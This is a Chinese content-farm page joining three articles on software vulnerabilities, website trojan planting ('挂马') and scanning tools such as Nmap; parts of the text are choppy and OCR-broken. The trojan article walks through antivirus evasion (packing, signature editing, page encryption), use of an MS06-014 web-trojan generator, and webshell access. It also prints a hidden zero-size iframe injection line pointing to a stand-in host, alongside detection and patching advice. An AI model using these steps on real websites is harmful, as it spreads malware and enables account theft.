网站首页 | 工作总结 | 工作报告 | 工作计划 | 演讲稿 | 自我鉴定 | 思想汇报 | 心得体会 | 书信范文 | 职场知识 | 作文大全 | 述职报告 | 读后感
易啊教育网
您的位置:易啊教育网修复社保漏洞漏洞 → 正文

漏洞

第一篇:漏洞

漏洞的概念 1 什么是漏洞 2 漏洞与具体系统环境之间的关心及其相 关特征 3 漏洞问题与不同安全级别计算机系统之 间的关系 安全漏洞与系统的攻击之间的关系 1 常见的攻击方法 2 系统攻击手段与系统漏洞 分类 计算机病毒问题与系统安全漏洞 XP 系统的常见问题 其他安全漏洞列举 安全策略漏洞防范 什么是漏洞 统漏洞这里是特指您的 Windows 操作系 统在逻辑设计上的缺陷或在编写时产生的 错误,这个缺陷或错误可以被不法者或者电 脑黑客利用,通过植入木马、病毒等方式来 攻击或控制整个电脑,从而窃取您电脑中的 重要资料和信息,甚至破坏您的系统。

漏洞会影响到的范围很大,包括系统本 身及其支撑软件,网络客户和服务器软件, 网络路由器和安全防火墙等。换而言之,在 这些不同的软硬件设备中都可能存在不同 的安全漏洞问题。在不同种类的软、硬件设 备,同种设备的不同版本之间,由不同设备 构成的不同系统之间,以及同种系统在不同 的设置条件下,都会存在各自不同的安全漏 洞问题。

windows 系统漏洞问题是与时间紧密相 关的。

一个 windows 系统从发布的那一天起, 随着用户的深入使用,系统中存在的漏洞会 被不断暴露出来,这些早先被发现的漏洞也 会不断被系统供应商:微软公司发布的补丁 软件修补,或在以后发布的新版系统中得以 纠正。而在新版系统纠正了旧版本中具有漏 洞的同时,也会引入一些新的漏洞和错误。

例如目前比较流行的是 ani 鼠标漏洞,他是 由于利用了 Windows 系统对鼠标图标处理 的缺陷,木马作者制造畸形图标文件从而溢 出,木马就可以在用户毫不知情的情况下执 行恶意代码。

因而随着时间的推移,旧的系统漏洞会 不断消失,新的系统漏洞会不断出现。系统 漏洞问题也会长期存在。

漏洞与具体系统环境之间的关心及其相关 特征 洞会影响到很大范围的软硬件设备,包括作 系统本身及其支撑软件,网络客户和服务器 软件,网络路由器和安全防火墙等。换而言 之,在这些不同的软硬件设备中都可能存在 不同的安全漏洞问题。在不同种类的软、硬 件设备,同种设备的不同版本之间,由不同 设备构成的不同系统之间,以及同种系统在 不同的设置条件下,都会存在各自不同的安 全漏洞问题。

漏洞问题是与时间紧密相关的。一个系统从 发布的那一天起,随着用户的深入使用,系 统中存在的漏洞会被不断暴露出来,这些早 先被发现的漏洞也会不断被系统供应商发 布的补丁软件修补,或在以后发布的新版系 统中得以纠正。而在新版系统纠正了旧版本 中具有漏洞的同时,也会引入一些新的漏洞 和错误。因而随着时间的推移,旧的漏洞会 不断消失,新的漏洞会不断出现。漏洞问题 也会长期存在。

因而脱离具体的时间和具体的系统环境来 讨论漏洞问题是毫无意义的。只能针对目标 系统的作系统版本、其上运行的软件版本以 及服务运行设置等实际环境来具体谈论其 中可能存在的漏洞及其可行的解决办法。

同时应该看到,对漏洞问题的研究必须要跟 踪当前最新的计算机系统及其安全问题的 最新发展动态。这一点如同对计算机病毒发 展问题的研究相似。如果在工作中不能保持 对新技术的跟踪,就没有谈论系统安全漏洞 问题的发言权,既使是以前所作的工作也会 逐渐失去价值 漏洞问题与不同安全级别计算机系统之间 的关系 目前计算机系统安全的分级标准一般都是 依据“橘皮书”中的定义。橘皮书正式名称是 “ 受 信 任 计 算 机 系 统 评 量 基 准 ” ( Trusted Computer System Evaluation Criteria)。橘皮 书中对可信任系统的定义是这样的:一个由 完整的硬件及软件所组成的系统,在不违反 访问权限的情况下,它能同时服务于不限定 个数的用户,并处理从一般机密到最高机密 等不同范围的信息。

橘皮书将一个计算机系统可接受的信任程 度加以分级,凡符合某些安全条件、 基准规则 的系统即可归类为某种安全等级。橘皮书将 计算机系统的安全性能由高而低划分为 A、 B、C、D 四大等级。其中

D 级——最低保护(Minimal Protection),凡 没有通过其他安全等级测试项目的系统即 属于该级,如 Dos,Windows 个人计算机系 统。

C 级 —— 自 主 访 问 控 制 ( Discretionary Protection),该等级的安全特点在于系统的 客体(如文件、目录)可由该系统主体(如 系统管理员、用户、应用程序)自主定义访 问权。例如:管理员可以决定系统中任意文 件的权限。当前 Unix、Linux、Windows NT 等作系统都为此安全等级。

B 级 —— 强 制 访 问 控 制 ( Mandatory Protection),该等级的安全特点在于由系统 强制对客体进行安全保护,在该级安全系统 中,每个系统客体(如文件、目录等资源) 及主体(如系统管理员、用户、应用程序)都 有自己的安全标签(Security Label) ,系统依据用户的 安全等级赋予其对各个对象的访问权限。

A 级——可验证访问控制(Verified Protection),而其 特点在于该等级的系统拥有正式的分析及数学式方法 可完全证明该系统的安全策略及安全规格的完整性与 一致性。

\' 可见,根据定义,系统的安全级别越高,理论上该系 统也越安全。可以说,系统安全级别是一种理论上的 安全保证机制。是指在正常情况下,在某个系统根据 理论得以正确实现时, 系统应该可以达到的安全程度。

系统安全漏洞是指可以用来对系统安全造成危害,系 统本身具有的,或设置上存在的缺陷。总之,漏洞是 系统在具体实现中的错误。比如在建立安全机制中规 划考虑上的缺陷,作系统和其他软件编程中的错误, 以及在使用该系统提供的安全机制时人为的配置错误 等。

安全漏洞的出现,是因为人们在对安全机制理论的具 体实现中发生了错误,是意外出现的非正常情况。而 在一切由人类实现的系统中都会不同程度的存在实现 和设置上的各种潜在错误。因而在所有系统中必定存 在某些安全漏洞,无论这些漏洞是否已被发现,也无 论该系统的理论安全级别如何。

所以可以认为,在一定程度上,安全漏洞问题是独立 于作系统本身的理论安全级别而存在的。并不是说, 系统所属的安全级别越高,该系统中存在的安全漏洞 就越少。

可以这么理解,当系统中存在的某些漏洞被入侵者利 用,使入侵者得以绕过系统中的一部分安全机制并获 得对系统一定程度的访问权限后,在安全性较高的系 统当中,入侵者如果希望进一步获得特权或对系统造 成较大的破坏,必须要克服更大的障碍 安全漏洞与系统的攻击之间的关系 常见的攻击方法 系统安全漏洞是在系统具体实现和具体使用中产生的 错误,但并不是系统中存在的错误都是安全漏洞。只 有能威胁到系统安全的错误才是漏洞。许多错误在通 常情况下并不会对系统安全造成危害,只有被人在某 些条件下故意使用时才会影响系统安全。

漏洞虽然可能最初就存在于系统当中,但一个漏洞并 不是自己出现的,必须要有人发现。在实际使用中, 用户会发现系统中存在错误,而入侵者会有意利用其 中的某些错误并使其成为威胁系统安全的工具,这时 人们会认识到这个错误是一个系统安全漏洞。系统供 应商会尽快发布针对这个漏洞的补丁程序,纠正这个 错误。这就是系统安全漏洞从被发现到被纠正的一般 过程。

系统攻击者往往是安全漏洞的发现者和使用者,要对 于一个系统进行攻击,如果不能发现和使用系统中存 在的安全漏洞是不可能成功的。对于安全级别较高的 系统尤其如此。

系统安全漏洞与系统攻击活动之间有紧密的关系。因 而不该脱离系统攻击活动来谈论安全漏洞问题。了解 常见的系统攻击方法,对于有针对性的理解系统漏洞 问题,以及找到相应的补救方法是十分必要的 系统攻击手段与系统漏洞分类 系统攻击是指某人非法使用或破坏某一信息系统中的 资源, 以及非授权使系统丧失部分或全部服务功能的行 为。

通常可以把攻击活动大致分为远程攻击和内部攻击两 种。现在随着互联网络的进步,其中的远程攻击技术得 到很大发展,威胁也越来越大,而其中涉及的系统漏洞 以及相关的知识也较多,因此有重要的研究价值 计算机病毒问题与系统安全漏洞 年以来,国外的知名安全公司机构厂商,如 微软、CVE 以及 Fortify Software 等组织针 对于计算机软件漏洞的客观性存在发布了 诸多公告。其中,软件开发的先导,即微软 公司,其作为全球最主要的软件导向引路 者、最大软件提供商,曾对用户自身经常使 用的 Windows 操作系统发布了相应的安全公 告,提供自身维护 Windows 操作系统的漏洞 信息、以及相关安全补丁的下载应用程序 等。同样,CVE 安全组织,也曾由美国国土 自身的国家网络安全机构的赞助与资助,在 企业界与学术界精选一批专业人才,组成了 许多科研小组,专门针对于目前的最为常见 的安全漏洞与缺陷进行质量化的整理,同时 根据漏洞特点进行命名,这样在 CVE 组织研 发机构人员的努力下,我们就能利用计算机 行业的先进有关技术对目前常见已知的安 全漏洞与缺陷进行安全鉴别、以及实时修复 等。CVE 的所发布的常见漏洞特征,以及当 前所有的三十多个漏洞库与 CVE 的服务条目 的应用,在很大程度提升了用户或者企业、 机关等机构组织使用计算机的安全能力。

而在国内, 一些常见、 家喻户晓的知名网络、 信息公司机构组织也积极吸收丰富经验与 技术,陆续创建了自身的漏洞数据库,诸如 中国安全信息论坛、中国教育与计算机网 (CERNET)、国家计算机应急处理中心机构 等。由此可见,计算机的软件安全漏洞所引 发的一系列问题,已经越来越受大家重视, 各界专业人士都积极地研究,努力地对其展 开相关科研工作。

近几年来,对漏洞所产生的安全技术不断持 续增多,目前已经使其技术的运用方向发展 为更为专业的自动化和智能化的方向去开 拓,使得潜在于表象的漏洞已逐渐浮出水 面,漏洞的潜在特征,不仅是针对于操作系 统平台与服务器,如,多数集中在网络中常 使用的 Web 浏览器、防范病毒的使用软件、 网络游戏客户端、播放器软件以及其他信息 产业产品的服务器、客户端等。另外,计算 机常见漏洞的研究热点主要有:文件自身格 式漏洞、Web 漏洞、ActiveX 控件执行漏洞、 虚拟程序漏洞、驱动程序漏洞、防毒安全防 护软件漏洞等。

XP 系统的常见问题 故障现象:这是多操作系统不注意安装 顺序经常出现的问题,如 Windows 98 和 Windows 2000 双系统,在重装 Windows 98 后,双启动菜单就会丢失。

解决之道:用 Windows 2000 启动光盘启 动电脑并选择“安装新的 Windows 2000”, 按默认状态安装。在“复制文件”过程结 束后安装程序会给出一个“正在重新启动 计算机”的对话框,请马上单击“不要重 新启动”按钮以退出安装过程。

如果没有及时按键,系统已经重启了, 也不要紧,您将会看到一个有 3 项内容启 动菜单,选择第一项或第三项都可以,待 系统启动后,进入 C 盘,你会发现根口录 上多了一些 Windows 2000 的安装文件,包 括一个文件夹$win nt$.~bt 和 5 个文件 $drvltr$~-~、$ldr$、boot.bak、 bootsect.dat 以及 txtsetup.if 等,其 他磁盘分区上也会多一个磁盘加速文件, 即$drvltr$.~-~,将它们删除即可。 此时,在 Windows 98 中的“查看”选项 里选择“显示所有文件”,然后编辑 C 盘 根目录的 boot. 文件, ini 将[bootloaderl 段的"default=C

$WIN_NT$.~BTBOOTSECT.DAT”改为 “default=C:”(Windows 98 为默认系统) 或 “default=multi(0)disk(0)rdisk(0)par tition(1)WINNT”(Windows 2000 为默认系 统),然后再将[operatingsystems]段的 “C

$WIN_NT$.~BTBOOTSECT.DAT="Microsof tWindows 2000 Professional 安装程序 "”.—行直接删除即可。 其他安全漏洞举例 Venustech ADLab:Microsoft Windows Kernel ANI File Parsing Crash Vulnerability 介绍:ANI 是 WINDOWS 支持的动画光 标格式, ANI 是由多个普通的光标文件 在 组成一个动画, 其中 ANI 文件的头处会标 记是几个图标 frame,WINDOWS 的内核在 显示光标的时候并未对该值进行检查, 如 果将这个数字设置为 0,会导致受影响的 WINDOWS 系统计算出错误的光标的地址并 加以访问,触发了内核的蓝屏崩溃。不仅 仅是应用使用 ANI 文件时会触发, 只要在 EXPLORER 下打开 ANI 文件存在的目录就 会触发。攻击者也可以发送光标的文件, 引诱用户访问含有恶意光标显示的页面, 以及发送嵌入光标的 HTML 邮件,导致被 攻击者系统蓝屏崩溃。

原理:在计算 frame 地址的时候失败 安全策略漏洞防范 1. 策略一:空密码登录 在 Windows XP 中,如果我 们的某个账户是空口令,也就是说账户没有 设置密码,那么在局域网中,当别人使用这 个空口令的账户登录到我们的电脑准备访 问资源时,访问将会被拒绝。之所以会出现 这个问题,是因为 Windows XP 默认权限设 置所致。如果希望使用空密码的账户也可以 进行网络登录, 则需要在 B 机中进行如下设 置操作

步骤 1.在“运行”栏中使用 命令“gpedit.msc”打开“组策略”窗口。

步骤 2.依次展开 “计算机配 置”-“Windows 设置”-“安全设置”-“本 地策略”-“安全选项” 。

步骤 3.双击右侧列表中的 “账户:使用空白密码的本地账户只允许进 行控制台登录”策略,打开该策略的属性窗 口。

步骤 4.单击选中“已禁用” 项后,即可允许使用空白密码的账户进行网 络登录了。这个策略的禁用,将直接影响 Guest 这个典型的没有密码的账户的网络登 录权限。但是,这样做将会大大减少黑客入 侵的阻力。

2. 登录 在默认状态下, 并不是所有 的账户都可以进行网络登录的。也就是说, 即便 A 机拥有 B 机中正式的账户和密码, 但未必 B 机就允许这个账户进行网络登录。

这与上面的“账户:使用空白密码的本地账 户只允许进行控制台登录”策略是一样的, 使用空白密码的账户可以进行本地登录,但 未必就可以进行网络登录。

在组策略编辑器中, 通过如 下操作可以设置允许网络登录的账户有哪 些, 步骤 1.在“运行”栏中使用 命令“gpedit.msc”打开“组策略”窗口。

步骤 2.依次展开 “计算机配 置”-“Windows 设置”-“安全设置”-“本 地策略”-“用户权利指派” 。

步骤 3.双击右侧列表中的 “拒绝从网络访问这台计算机”策略,打开 该策略的属性窗口。

策略二:网络拒绝 步骤 4.在属性列表中, 已经 有的账户将不能进行网络登录,如 guest 账 户。显然,如果不希望某人账户(如管理员 级别的账户组) 进行网络访问, 只需单击 “添 加用户或组”按钮将其添加到这里即可。

如果希望某个账户可以进 行网络访问,那么保证其不在这个列表中即 可。

对于一些黑客感兴趣的默认 (如 guest) , 可以将其添加到这里,这样也可以彻底杜绝 共享涵洞。

实际上安全策略就好比大 门被屋里的人加了一道保险一样,虽然外面 的人钥匙正确,但里面的保险是否打开还要 看屋里面的人是否愿意。

这就好比 B 机在说 “喂!A 机来访问了,是不是允许他进门 呢?” 本文 来自

牛站 长论 坛 详细文 章 参 考

http://www.nb5.cn/thread-941440-1-1.html

第一篇:漏洞

网站挂马是如何被挂的, 网站挂马是如何被挂的,教您如何查找漏洞 挂马是如何被挂的 很多朋友都碰到过这样的现象:打开一个网站,结果页面还没显示,杀毒软件就开始报警,提示检测到 木马病毒。有经验的朋友会知道这是网页病毒,但是自己打开的明明是正规网站,没有哪家正规网站会 将病毒放在自己的网页上吧?那么是什么导致了这种现象的发生呢?其中最有可能的一个原因就是

这 个网站被挂马了。

挂马这个词目前我们似乎经常能听到,那么什么是挂马呢?挂马就是黑客入侵了一些网站后,将自 己编写的网页木马嵌入被黑网站的主页中, 利用被黑网站的流量将自己的网页木马传播开去, 以达到自 己不可告人的目的。例如很多游戏网站被挂马,黑客的目的就是盗取浏览该网站玩家的游戏账号,而那 些大型网站被挂马,则是为了搜集大量的肉鸡。网站被挂马不仅会让自己的网站失去信誉,丢失大量客 户,也会让我们这些普通用户陷入黑客设下的陷阱,沦为黑客的肉鸡。下面就让我们来了解这种时下最 流行的黑客攻击手段。

挂马的核心

挂马的核心:木马 从“挂马”这个词中我们就可以知道,这和木马脱离不了关系。的确,挂马的目的就是将木马传播出 去,挂马只是一种手段。挂马使用的木马大致可以分为两类:一类是以远程控制为目的的木马,黑客使 用这种木马进行挂马攻击, 其目的是为了得到大量的肉鸡, 以此对某些网站实施拒绝服务攻击或达到其 他目的(目前绝大多数实施拒绝服务攻击的傀儡计算机都是挂马攻击的受害者)。另一类是键盘记录木 马,我们通常称其为盗号木马,其目的不言而喻,都是冲着我们的游戏帐号或者银行帐号来的。目前挂 马所使用的木马多数属于后者。

木马的免杀伎俩 作为挂马所用的木马,其隐蔽性一定要高,这样就可以让用户在不知不觉中运行木马,也可以让挂 马的页面存活更多的时间。

黑客为了让木马躲避杀毒软件的查杀, 使用的伎俩很多。

通常使用的方法有

加壳处理:关于壳的概念我们曾经介绍过,就是为了让别人无法修改编译好的程序文件,同时压缩 程序体积。

木马经过加壳这一道工序后就有可能逃过杀毒软件的查杀, 这也是为什么我们装了杀毒软件 还会感染老病毒的原因。

虽然目前的杀毒软件都支持对程序脱壳后再查杀, 但只局限于一些比较热门的 加壳程序,例如 aspack、UPX 等,而碰上一些经过冷门加壳程序处理后的木马时,就无能为力了。所 以加壳仍是黑客比较常用的免杀伎俩之一。

冷门的加壳程序 修改特征码:杀毒软件是根据病毒特征码来判定一个程序是否是病毒的。杀毒软件在对程序进行检 测时,如果在程序中发现了病毒特征码,就将该程序判定为病毒。黑客当然也明白这个道理,于是他们 会修改木马中被定为特征码的部分代码, 将其加密或使用汇编指令将其跳转, 这样杀毒软件就无法在木 马中找到病毒特征码,自然也就不会将其判定为病毒了。

虽然这两种方法都可以躲过杀毒软件的查杀,但是我们还是有办法阻止木马运行的,具体方法将在 防范部分讲到。那么木马是如何“挂”在网站上的呢?这里我们以“灰鸽子”木马为例,演示一下黑客挂马 的过程。演示用的“灰鸽子”木马已经经过免杀处理,杀毒软件无法查杀。 潜伏的攻击者

潜伏的攻击者:网页木马 为什么我们一打开网页就会运行木马程序, 木马又是如何“挂”在网站上的呢?这就要涉及“网页木马” 这个概念。

网页木马就是将木马和网页结合在一起,打开网页的同时也会运行木马。最初的网页木马原理是利 用 IE 浏览器的 ActiveX 控件,运行网页木马后会弹出一个控件下载提示,只有点击确认后才会运行其 中的木马。

这种网页木马在当时网络安全意识普遍不高的情况下还是有一点使用价值的, 但是其缺点是 显而易见的,就是会出现 ActiveX 控件下载提示。当然现在很少会有人去点击那莫名其妙的 ActiveX 控 件下载确认窗口。

在这种情况下,新的网页木马诞生了。这类网页木马通常利用了 IE 浏览器的漏洞,在运行的时候没 有丝毫提示,因此隐蔽性极高。可以说,正是 IE 浏览器层出不穷的漏洞造成了如今网页木马横行的网 络。例如最近的 IE 浏览器漏洞 MS06-014,就可以利用来制作一个绝对隐蔽的网页木马。下面让我们看 看利用 MS06-014 制作网页木马的过程。

网页木马当然得有木马程序,这里我们使用上文中提到的“灰鸽子”木马。然后我们要下载一个 MS06-014 网页木马生成器。接着还要一个网页空间,三者准备完毕后,就可以开始测试了。

生成网页木马 生成网页木马 首先将木马程序上传到网页空间中。运行“MS06-014 木马生成器”,在“木马地址”中填入已经上传到 空间中的木马网址,并勾选下方的“是否隐藏源码”选项。这个选项的作用是当网页木马运行后,会自动 清空网页源文件,用户即使起了疑心也无法找到痕迹。当然清空的是用户打开的源文件,而网页木马却 不受影响。点击“生成网马”按钮即可在程序的同目录生成一个名为 muma.htm 的网页木马 配置网页木马 继续进行网页木马的配置,在“欲加密的网页”中浏览选中生成的网页木马。网页木马在运行时会利 用 IE 的漏洞,其中肯定存在漏洞利用代码,这些代码会被杀毒软件检测出来,因此要想隐蔽地运行网 页木马,加密木马程序还不够,还需对网页木马进行加密。“MS06-014 木马生成器”的“加密方式”中提 供了四种网页的加密方式,分别是:空字符加密、转义字符加密、Escape 加密和拆分特征码。这里我 们使用“转义字符加密”加密方式,选中“转义字符加密”选项后点击“加密”按钮,免杀的网页木马就生成 了。将该加密过的网页木马上传到网页空间中即可。

寻找缺陷网站, 寻找缺陷网站,写入网页木马 网页木马准备完毕,就等着寻找挂马的目标网站了。此时黑客会到处搜索,寻找有脚本缺陷的网站 程序,找到后利用网站程序的漏洞入侵网站,并得到网站的一个 webshell。这时我们可以编辑网站首页 的内容,将挂马的代码插入即可。代码为:<iframe src="http://127.0.0.1/muma.htm" width="0" height="0" frameborder="0"></iframe>,src 参数后面的是网页木马的地址。当我们打开这个网站的首页后,会弹出 网页木马的页面,这个页面我们是无法看到的,因为我们在代码中设置了弹出页面的窗口长宽各为 0。

此时木马也已经悄悄下载到本机并运行了。我们可以看到,网站的首页显示正常,杀毒软件并没有任何 反应,而木马却已经运行了,可见木马的隐蔽性很高,危害也相当严重。成功运行木马 铲除网站“挂马 毒瘤 铲除网站 挂马”毒瘤 挂马 “挂马”攻击已经成为目前最流行的攻击方式, 面对数量庞大的“挂马”网站, 我们该如何防御呢?作为 一名网站站长,我们又如何知道自己的网站被人挂马了呢? 站长防范:如果你是一名站长,可以对网站首页以及其他主要页面的源代码进行检查,用记事本打 开这些页面后,以“<iframe>”为关键字进行搜索,找到后可以查看是否是挂马代码。不过碰上有经验的 黑客,会编写一段代码将整句挂马代码进行加密,这样我们就很难找到网页中的挂马代码。这时可以将 所有网页文件按修改时间进行排序,如果有个别网页被修改,我们可以很快地发现。

当然,最好的办法就是设置好网站的权限,对于使用动态语言编写的网站,一般对网页文件是不需 要改动的,所有的数据都存储在数据库中。因此我们可以只对数据库所在的文件夹设置写权限,而对整 个网站文件夹设置只读权限,这样即使网站存在漏洞,黑客也别想通过脚本漏洞入侵网站,更别说在主 页上挂马了。

普通用户防范:普通用户关心的自然是如何防范“挂马”攻击。既然杀毒软件在网页木马面前成了“睁 眼瞎”,而我们又无法感知网站是否被“挂马”。在这种情况下,我们岂不是任人宰割?我们已经知道网 页木马的运行原理利用了 IE 浏览器的漏洞, 因此只要我们及时更新系统补丁就可以让网页木马失效了。

开启系统“自动更新”的方法为:右键点击“我的电脑”,选择“属性”,切换到“自动更新”标签,选中其中 的“自动(推荐)”即可。此外我们也可以使用“360 安全卫士”等具有补丁更新功能的软件。运行“360 安 全卫士”后,点击“修复”→修复系统漏洞,即可查看系统的补丁状态,勾选未安装的补丁下载即可。使 用“360 安全卫士”更新补丁 杀毒软件在网页木马前失去了作用,不代表我们就拿它没辙。我们可以使用一款名为 System Safety Monitor(以下简称为 SSM)的软件,在它的监控下,没有一个木马病毒可以躲过它的眼睛。安装完毕 后运行,其自动最小化到系统任务栏,开始对系统进行监控。SSM 的监控功能相当强悍,系统内部的 一些操作也会被监控并提醒。让我们看看 SSM 对付这种加密过的网页木马效果如何,打开挂有木马 XXXX.com 程序,其意思是 IE 浏览器想运行 XXXX.com 这个可执行程序。IE 浏览器对于可执行程序 是提示下载的,而不会直接运行,由此可见其中的猫腻,此时我们点击“拒绝”按钮就可以阻止网页木马 的运行了。SSM 的监控原理和杀毒软件不同,其最大特点是可以监控到所有的网页木马,由于其使用 较一般安全软件来得复杂,因此建议中高级用户使用。

网站挂马行业揭秘 经常会在一些论坛和站点看到这样类似的广告:“万 IP120 元,日结!联系 QQ:XXXXX”而往往加了 QQ 以后,都会被要求在页面挂上一段类似开篇时提到的<iframe src="http://127.0.0.1" height=0 width=0></iframe>,而打开中间的链接地址,往往只会有一个站长统计显示。如果您曾经接触过这样类 型的情景,那么恭喜您,这就是传说中的挂马行业大军了。在做这篇报道时,小编专门约了两名与挂马 行业有密切联系的人,一名是曾经的挂马销售员,另外一名是挂马站长。从这两位业内人士描述中,让 我们一起了解这个神秘行业。

挂马方:金字塔结构形式 挂马方

“一般,挂马的目的无非是为了盗取游戏帐号、QQ 密码以及服务器资源和刷流量。”挂马业内销售小 K 这样跟小编说道挂马目的。

挂马者先是找技术人员写出马来, 而后招募马仔以万 IP180-200 的价格出货, 一般,程序员写出来的马又分免杀加壳和不免杀加壳以及不免杀等几个类型。

(免杀的意思就是装杀毒 软件并不能扫描出有病毒木马来。)而一线的马仔又把从挂马者那拿到的代码以万 IP160-180 的价格出 货给下一层销售人员,再由下一层的销售人员通过 QQ、邮件、广告等方式具体销售给挂马的站长们。

一般来讲一个新马出来的时间不会太长就会失效。

而且幕后的老板 (也就是挂马者) 很容易跑路, 所以, 挂马时都采取日结的方式(每天现金结算一次)。而统计 IP 则是采用页面上放置的站长统计。

站长

站长:多数挂马站长知情并乐此不疲 “其实我知道这是个缺德的行为,但是站长也得吃饭呀!”站长小 Z 在接受访问时无奈的表示。自从 06 年以来,中国站长网赚圈就低迷了许多,钱越来越不容易赚。联盟月结算,扣量,延发拥金等种种因素, 让更多的站长选择了挂马这种来钱快的行业。“我有很多的站点,就是你们口中的垃圾站,一个站一天 几千 IP,如果做网络联盟,一个月也就 200 左右,而挂马,一个月大几千。但是,也是有选择性的挂, 比如一些擦边图片站,一些俗站。正规类的站点是打死也不挂的。”小 Z 谈到挂马和联盟收入的差距时 说道。收入差距大,佣金支付快,虽然也会经常遇到挂了一天就跑路的,但损失也不大。但也并不是所 有站长像小 Z 这样幸运。另一名曾经挂马的站长小 X 就因为挂马被抓进去呆了一段时间。“本来以为挂 马并没什么,谁能想到是恶意传播病毒?被相关机关抓去了才知道自己犯法了。”小 X 至今谈到被抓当 晚还心有余悸。但是挂马者也不是什么站都收的,流量上要有限制,一般起点是日 IP1000 以上,并且 还要纯流量。闹腾最大动静的 2007 年,很多站点都被挂了马,有主动的,有被动。当时作为业内最大 站点的中国站长站为此还专门策划了个专题去号召站长们抵制挂马,净化中国网络环境 更多详细介绍:http://guama.xmseoer.com 访问我的网站时杀毒软件报警提示中了木马怎么办 访问我的网站时杀毒软件报警提示中了木马怎么办? 时杀毒软件报警提示中了木马怎么办 有时会收到一些客户反映网站被黑,或被上传木马,当用户访问网站时就会下载病毒或者木马,杀毒 软件弹出病毒的提示。这种情况是以下 2 种情况导致的

第一种情况:客户网站存在文件上传漏洞,导致黑客可以使用这漏洞,上传黑客文件。然后黑客 可以对该用户网站所有文件进行任意修改,这种情况比较普遍。针对这种情况, 用户需要找技术人员。

检查出网站漏洞并彻底修复,并检查看网站是否还有黑客隐藏的恶意文件。

原 因:很多网站都需要使用到文件上传功能,例如很多网站需要发布产品图片等。

文件上传功 能本来应该具有严格的限定。例如:只允许用户只能上传 JPG,GIF 等图片。但由于程序开发人员考虑 不严谨,或者直接是调用一些通用的文件上传 组件, 导致没对文件上传进行严格的检查。

处理:处理关键是要用户自己知道自己网站哪些地方使用到了文件上传功能。

重点针对这个文件上传功能进行检查,同时针对网站所有文件进行检查,排查可疑信息。同时也 利用网站日志,对文件被修改时间进行检查

1、查到哪个文件被加入代码:用户要查看自己网页代码。根据被加入代码的位置,确定到底是 哪个页面被黑,一般黑客会去修改数据库连接文件或网站顶部/底部的文件,因为这样修改后用户网站 所有页面都会被附加代码。

2、查到被篡改文件后,使用 FTP 查看文件最后被修改时间,例如 FTP 里面查看到 conn.asp 文 件被黑,最后修改时间是 2008-05-16 03:41 分,那么可以确定在 2008 年 5 月 16 日 03:41 分这个时 间,有黑客使用他留下的黑客后门,篡改了您的 conn.asp 这个文件。

注意

1、很多用户网站被黑后,只是将被串改的文件修正过来,或重新上传,这样并没有多大作用。如果网 站不修复漏洞,黑客可以很快再次利用这漏洞,对用户网站再次入侵。

2、网站漏洞的检查和修复需要一定的技术人员才能处理。用户需要先做好文件的备份。

第二种情况:用户本地机器中毒了,修改了用户自己本地的网页文件,然后用户自己将这些网页文件 上传到服务器空间上。这种情况比较少,如是这种情况用户要先彻底检查自己网站。

1、这种病毒一般是搜索本地磁盘的文件,在网页文件的源代码中插入一段带有病毒的代码,而一般最 常见的方式是插入一个 iframe,然后将这个 iframe 的 src 属性指向到一个带有病毒的网址。

2、如何检测这种情况呢? a、浏览网站,右键查看源代码,在源代码里搜索 iframe,看看有没有被插入了一些不是自己网站的页 面,如果有,一般就是恶意代码。

b、也是右键查看源代码,搜索“script”这个关键字,看看有没有被插入一些不是自己域名下的的脚本, 如果有,并且不是自己放上去的,那很可能也有问题。

3、这种病毒怎么杀呢? a、有些人会说用查毒程序查过本地没有发现病毒,这就要看看本地的网站文件是否带有这些恶意代码, 如果有,那基本上可以肯定你的机器是曾经中过毒的,这些病毒可能不是常驻内存的,并且有可能执行 一次之后就将自己删除,所以用查毒程序查不出来是很正常的。

b、 就算这些病毒是常驻内存,杀毒程序也可能查不出来,因为这种病毒的原理很简单,其实就是执行 一下文件磁盘扫描,找到那些网页文件(如:.asp .php .html 等格式的文件),然后打开它插入一段代 码,然后再保存一下。因为它修改的不是什么系统文件,病毒防火墙一般不会发出警告,如果它不是挂 在一些系 统进程里,而是在某个特定的时刻运行一下就退出,这样被查出的可能性更少。

3、中毒的常见原因: 一般是因为上了一些垃圾网站, 这些网站有木马, 然后机器就中毒了, 主机屋的服务器一般不会中毒的, 中毒的可能性很少。

至于说其它客户上传了一些有问题的程序然后令服务器中毒也是不成立的, 因为普 通的客户的 IIS 进程是没有权限去修改其它客户的网站的。

第一篇:漏洞

漏洞扫描工具 艾勇 单月光 漏洞——任何可能会给系统和网络安 全带来隐患的因素 任何系统和网络都有漏洞 漏洞分类

(1)系统或应用本身存在的漏洞 (2)配置不当所造成的漏洞 漏洞扫描是一种基于网络远程检测目标网络或 本地主机安全性脆弱点的技术。通常也是指基于漏 洞数据库,通过扫描等手段,对指定的远程或者本 地计算机系统的安全脆弱性进行检测,发现可利用 的漏洞的漏洞的 一种安全检测(渗透攻击)行为。

漏洞扫描工具就是利用漏洞并对漏洞进行操作。 主要内容 ?端口扫描器 —Nmap、Nwatch —检测对方服务器的开放端口,侦测对方服务 器服务 ?漏洞扫描器 —X-scan、nessus、流光 —检查系统漏洞、配置错误 ?Web应用扫描 —Nikto、appscan、webinspect —检查Web应用数据提交、信息泄露等问题 Nmap ?Nmap简介 ?Nmap的获取和安装 ?Nmap的功能和用法 ?Nmap使用示例 ?NmapFE——Nmap的GUI界面 ?基于Windows的Nmap ?Nmap优缺点 Nmap介绍 ? Nmap是一个网络探测和漏洞扫描程序 ? 安全管理人员可以使用Nmap软件对系统和 网络进行扫描,获取网络中正在运行的主 机以及主机提供的服务等信息 ? Nmap通过向对方服务器的特定端口发送数 据包,作文根据应答来判断端口漏洞 Nmap的下载和安装 ? 官方网站免费下载 http://www.insecure.org/nmap/ ? Linux下安装 #rpm –ivh nmap-x.xx.i386.rpm Nmap的功能和用法 ? Nmap的语法

